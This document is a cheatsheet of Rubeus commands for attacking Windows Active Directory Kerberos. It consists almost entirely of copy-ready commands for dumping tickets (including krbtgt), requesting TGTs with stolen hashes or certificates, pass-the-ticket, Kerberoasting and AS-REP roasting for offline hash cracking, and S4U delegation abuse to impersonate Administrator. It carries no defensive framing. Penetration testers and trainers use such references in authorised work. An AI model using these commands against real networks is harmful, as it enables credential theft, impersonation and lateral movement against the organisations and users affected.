Rubeus Cheatsheet
Basic Syntax
Rubeus.exe <command> [options]
Quick Reference Commands
| Command | Purpose |
|---|---|
| dump | Dump all Kerberos tickets |
| asktgt | Request a TGT using hash or password |
| asktgs | Request a TGS for a specific service |
| ptt | Pass the Ticket (import ticket) |
| createnetonly | Create sacrificial logon session |
| renew | Renew a TGT |
| describe | Describe a ticket |
| hash | Calculate Kerberos hashes from password |
| kerberoast | Kerberoast attack |
| asreproast | AS-REP Roasting attack |
| s4u | S4U constrained delegation abuse |
PKINIT (Certificate Authentication)
Request TGT with PFX Certificate
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:<path_or_base64> /password:<pfx_password> /nowrap
Request TGT with PFX and Import
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:C:\cert.pfx /password:CertPass123 /ptt
Note: Used in Pass-the-Certificate attacks after obtaining a certificate from AD CS exploitation or Shadow Credentials attacks.
Ticket Harvesting
Dump All Tickets (Base64)
Rubeus.exe dump /nowrap
Dump Tickets for Current User
Rubeus.exe dump /user:current /nowrap
Dump Specific Service Tickets
Rubeus.exe dump /service:krbtgt /nowrap
Triage (List Tickets)
Rubeus.exe triage
Request Tickets (asktgt)
Request TGT with NTLM Hash (RC4)
Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<ntlm_hash> /nowrap
Request TGT with AES256 Hash
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<aes256_hash> /nowrap
Request TGT with Password
Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /nowrap
Request TGT and Import (/ptt)
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<hash> /ptt
Request TGT Using Domain Controller
Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<hash> /dc:<dc_ip> /nowrap
Request TGT with Certificate (PKINIT)
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:<base64_or_path> /password:<pfx_password> /nowrap
Request TGT with Certificate File
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:C:\path\to\cert.pfx /password:<pfx_password> /ptt
Pass the Ticket (ptt)
Import .kirbi File
Rubeus.exe ptt /ticket:<path_to_kirbi>
Import Base64 Ticket
Rubeus.exe ptt /ticket:<base64_encoded_ticket>
Sacrificial Process (createnetonly)
Create a process in a new logon session (the window is hidden unless /show is given):
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
Then in the new window, request a ticket:
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<hash> /ptt
Kerberoasting
Kerberoast All Users
Rubeus.exe kerberoast /nowrap
Kerberoast Specific User
Rubeus.exe kerberoast /user:<username> /nowrap
Kerberoast with Output Format for Hashcat
Rubeus.exe kerberoast /format:hashcat /nowrap
Kerberoast with AES Encryption
Rubeus.exe kerberoast /aes /nowrap
AS-REP Roasting
AS-REP Roast All Users
Rubeus.exe asreproast /nowrap
AS-REP Roast Specific User
Rubeus.exe asreproast /user:<username> /nowrap
AS-REP Roast with Hashcat Format
Rubeus.exe asreproast /format:hashcat /nowrap
Request Service Tickets (asktgs)
Request TGS for Service
Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/server.domain.local /nowrap
Request TGS and Import
Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/server.domain.local /ptt
Constrained Delegation (S4U)
S4U2Self and S4U2Proxy
Rubeus.exe s4u /user:<service_account> /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
S4U with Alternate Service
Rubeus.exe s4u /user:<service_account> /aes256:<hash> /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /altservice:ldap /ptt
Ticket Operations
Describe a Ticket
Rubeus.exe describe /ticket:<base64_or_path>
Renew a TGT
Rubeus.exe renew /ticket:<base64_or_path> /nowrap
Purge Tickets (Current Session)
Rubeus.exe purge
Purge Tickets (Specific LUID)
Rubeus.exe purge /luid:<luid>
Hash Calculation
Calculate Kerberos Hashes from Password
Rubeus.exe hash /user:<username> /domain:<domain> /password:<password>
Output includes:
- rc4_hmac (NTLM)
- aes128_cts_hmac_sha1
- aes256_cts_hmac_sha1
- des_cbc_md5
Monitoring
Monitor for TGTs (4624 Logon Events)
Rubeus.exe monitor /interval:5
Monitor with Filtering
Rubeus.exe monitor /interval:5 /filteruser:<username>
Common Options
| Option | Description |
|---|---|
| /nowrap | Don't wrap Base64 output (easier copy-paste) |
| /ptt | Pass the ticket (import into current session) |
| /dc:<ip> | Specify domain controller |
| /domain:<domain> | Specify domain |
| /user:<user> | Specify user |
| /outfile:<path> | Write ticket to file |
| /luid:<luid> | Target specific logon session |
One-Liners
Dump All Tickets
Rubeus.exe dump /nowrap
Request TGT and Import
Rubeus.exe asktgt /user:john /domain:domain.local /aes256:<hash> /ptt
Kerberoast and Save
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
Create Sacrificial Session and Request TGT
Rubeus.exe createnetonly /program:cmd.exe /show
:: In new window:
Rubeus.exe asktgt /user:john /domain:domain.local /rc4:<hash> /ptt
Convert .kirbi to Base64 (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("ticket.kirbi"))
Convert Base64 to .kirbi (PowerShell)
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_string>"))